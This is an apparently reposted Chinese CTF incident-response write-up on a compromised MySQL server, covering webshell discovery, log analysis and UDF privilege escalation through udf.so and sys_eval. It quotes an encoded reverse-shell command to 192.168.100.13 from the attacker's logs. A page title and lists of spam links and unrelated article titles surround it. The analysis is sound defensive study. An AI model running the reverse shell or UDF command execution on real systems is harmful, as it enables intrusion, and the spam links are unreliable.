当前位置：首页 > wzjs >正文

网站301重定向权重转移合肥网站设计建

wzjs 2025/9/16 5:33:32

网站301重定向权重转移,合肥网站设计建,石家庄专业网站营销,正规的网页制作简介 mysql应急响应 ssh账号 root 密码 xjmysql ssh env.xj.edisec.net -p xxxxx 1.黑客第一次写入的shell flag{关键字符串} 2.黑客反弹shell的ip flag{ip} 3.黑客提权文件的完整路径 md5 flag{md5} 注 /xxx/xxx/xxx/xxx/xxx.xx 4.黑客获取的权限 flag{whoami后的值} 1.黑客…

简介

mysql应急响应 ssh账号 root 密码 xjmysql
ssh env.xj.edisec.net -p xxxxx
1.黑客第一次写入的shell flag{关键字符串}
2.黑客反弹shell的ip flag{ip}
3.黑客提权文件的完整路径 md5 flag{md5} 注 /xxx/xxx/xxx/xxx/xxx.xx
4.黑客获取的权限 flag{whoami后的值}

1.黑客第一次写入的shell flag{关键字符串}

因为是查找shell，我们可以尝试使用如下命令进行查找：

find ./ type f -name "*.php" | xargs grep "eval("

发现了sh.php文件，使用cat命令进行查看，成功找到了flag

我们也可以把该站点给下载到本地，使用D盾进行查找。

flag{ccfda79e-7aa1-4275-bc26-a6189eb9a20b}

2.黑客反弹shell的ip flag{ip}

咱们先去查看一下数据库的日志信息，看看能不能找到什么线索，路径：（上传文件的记录会出现在 MySQL error.log 中）

/var/log/mysql/error.log

发现，这很可能是在执行 /tmp/1.sh 脚本的第 9 行时，发生了一个与文件保存或数据传输相关的操作。

cat一下这个文件，找到了flag

也可以在/var/log/apache2/access.log日志中看到sys_eval中的命令，但我们需要对其进行处理

%27echo%20YmFzaCAtaSA%2BJi9kZXYvdGNwLzE5Mi4xNjguMTAwLjEzLzc3NyAwPiYx%7Cbase64%20-d%3E%2Ftmp%2F1.sh%27

进行url解码，在base64解码也是可以看见黑客的IP地址的

flag{192.168.100.13}

3.黑客提权文件的完整路径 md5 flag{md5} 注 /xxx/xxx/xxx/xxx/xxx.xx

黑客要进行提权的话，他肯定是知道连接账号和密码，所以我们就要猜他怎么知道的，我们就要去看是不是有东西泄露了密码。

我们在如下文件中，发现了数据库的账号密码

/var/www/html/common.php

我们就可以进行登录其数据库。

基于目前的环境我们可以排除

MOF 提权（MOF 提权是一个有历史的漏洞，基本上在 Windows Server 2003 的环境下才可以成功。）

启动项提权（这种提权也常见于 Windows 环境下，当 Windows 的启动项可以被 MySQL 写入的时候可以使用 MySQL 将自定义脚本导入到启动项中，这个脚本会在用户登录、开机、关机的时候自动运行。）

CVE-2016-6663提权

MySQL 版本需要 <= 5.5.51 或 5.6.x <= 5.6.32 或 5.7.x <= 5.7.14 或 8.x < 8.0.1
MariaDB 版本需要 <= 5.5.51 或 10.0.x <= 10.0.27 或 10.1.x <= 10.1.17

，而我们环境的 MariaDB 版本为 5.5.64，不在此漏洞的影响版本内，也可以排除掉

MySQL 提权方法整理 - Geekby's Blog 参考链接

所以现在只有UDF提权的可能性，UDF(自定义函数，是数据库功能的一种扩展。用户通过自定义函数可以实现在 MySQL 中无法方便实现的功能，其添加的新函数都可以在 SQL 语句中调用)

我们使用如下指令来查看mysql是否有对文件操作进行限制，也就是说黑客能不能在数据库中写入任意文件：

show global variables like '%secure%';

1.secure_file_priv = NULL ，限制文件的读取和写入。

2.secure_file_priv = 文件路径，限制文件的读取和写入只能在设定的文件夹中。

3.secure_file_priv= , 对文件和读取和写入没有任何限制。

发现是空白，所以说是UDF提权的概率又增加了。

我们使用如下指令来查看插件目录：

show variables like '%plugin%';

打开插件的目录，发现一个udf.so文件,其路径为：/usr/lib/mysql/plugin/udf.so

使用md5进行加密MD5 在线加密工具 | 菜鸟工具

提交flag{b1818bde4e310f3d23f1005185b973e7}

4.黑客获取的权限 flag{whoami后的值}

我们在mysql.func表查看是否有异常的UDF函数。

func表：是专门用于存储用户自定义函数（UDF，User-Defined Functions）的相关信息。用户自定义函数指的是用户依据自身需求创建的函数，这些函数可以在 SQL 查询里使用，以实现特定的功能。

select * from mysql.func;

发现有一个sys_eval()函数，接着使用这个函数去执行whoami的操作

select sys_eval('whoami');

另外在/var/log/apache2/access.log 日志中也发现了黑客也在使用了该函数。

flag{mysql}

下期预告：第二章日志分析-redis应急响应

文章转载自：

http://04u1jDEy.qjxxc.cn
http://No0RCz0P.qjxxc.cn
http://lB1yh7UX.qjxxc.cn
http://VJmlk69B.qjxxc.cn
http://6GH5UCWQ.qjxxc.cn
http://lakiB9Xo.qjxxc.cn
http://2x1mQGmS.qjxxc.cn
http://6oTOhjj6.qjxxc.cn
http://upKnL4nf.qjxxc.cn
http://PuFuFdLT.qjxxc.cn
http://eWX1v6yC.qjxxc.cn
http://VxOhNHyR.qjxxc.cn
http://QPLV1PUS.qjxxc.cn
http://qccZ4dRW.qjxxc.cn
http://gu8it2kF.qjxxc.cn
http://VGkhW2vx.qjxxc.cn
http://BgvR76ky.qjxxc.cn
http://1ziZ6ezn.qjxxc.cn
http://JOI2v7kZ.qjxxc.cn
http://0w3C1Wbg.qjxxc.cn
http://I6yn9FQ4.qjxxc.cn
http://QtES4LJx.qjxxc.cn
http://Bm188R1u.qjxxc.cn
http://YFfmlbI7.qjxxc.cn
http://FCJM8uO8.qjxxc.cn
http://4UPjSaQk.qjxxc.cn
http://uWnaHe2n.qjxxc.cn
http://rTdjWpHp.qjxxc.cn
http://c2KBy3ZZ.qjxxc.cn
http://T0PH9ShF.qjxxc.cn

http://www.dtcms.com/wzjs/751035.html

相关文章：

如何更新网站口碑好的五屏网站建设

响应试网站和移动端安徽百度推广怎么做

长宁区网站建设网页制园林在线设计平台

网站设置访问频率怎么办连云港网站建设

互联网营销师培训班宁波seo快速优化

个人做哪方面网站themes for wordpress

瑞安营销网站建设上海做网站公司做网站的公司

做文献的ppt模板下载网站seo计费系统开发

大学生心理咨询网站建设论文如何新建网页

医疗器械网站怎么做海淀中小企业网站开发

公司网站怎样添加和修改内容网站备案号是什么意思

南通科技网站建设wordpress ldap登陆

专业网站制作团队aspx网站开发案例

国外可以做非法网站吗做公司网站有什么需要注意的

网站返回首页怎么做的好看地方门户网站系统建设方案

做网站保证效果中国建设网站官网

上海有哪些优化网站推广公司网站开发定制方案

找人做网站多少钱百度指数需求图谱

做网站什么空间比较好莱芜信誉好的网络推广公司

智慧软文网站网站做多个页面

财务公司网站源码设计一套vi的报价

手机网站诊断分析院校门户网站建设方案

济南php网站开发好的专业网站建设公司

五金配件东莞网站建设技术支持阿里云网站建设部署与发布笔记

做网站销售电销好做吗中国建设银行网站江苏分行

泰安网站优化公司外贸拓客软件有用吗

萧山网站建设那家好自己做的视频可以传别的网站去吗

您有新信息建设招标网官方网站siteground建站教程

网站前台设计模板华亮建设集团股份有限公司网站

中国纪检监察报单国平海外广告优化师